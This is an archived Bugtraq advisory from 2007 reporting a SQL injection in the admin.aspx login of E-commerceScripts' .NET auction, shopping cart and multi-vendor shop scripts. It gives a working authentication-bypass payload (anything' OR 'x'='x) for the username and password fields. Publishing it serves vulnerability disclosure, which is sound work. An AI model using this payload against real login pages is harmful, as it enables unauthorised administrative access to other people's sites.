Bugtraq mailing list archives

E-commerceScripts ALL Apps (Auction Script, Shopping Cart Script and Multi-Vendor E-Shop Script) admin.aspx SQL

From: Advisory () aria-security net
Date: 28 Jul 2007 23:18:52 -0000

_________________________

A R I A - S E C U R I T Y 
_________________________
Vendor: http://www.e-commercescripts.com/dotnet/
E-commerceScripts ALL Apps (Auction Script, Shopping Cart Script and Multi-Vendor E-Shop Script) admin.aspx SQL 

Injection


Username: anything' OR 'x'='x
password: whatever you want ( or anything' OR 'x'='x)


Credits: Aria-Security Team
http://aria-security.net
http://outlaw.aria-security.info [PERSONAL BLOG]

Current thread:

E-commerceScripts ALL Apps (Auction Script, Shopping Cart Script and Multi-Vendor E-Shop Script) admin.aspx SQL Advisory (Jul 30)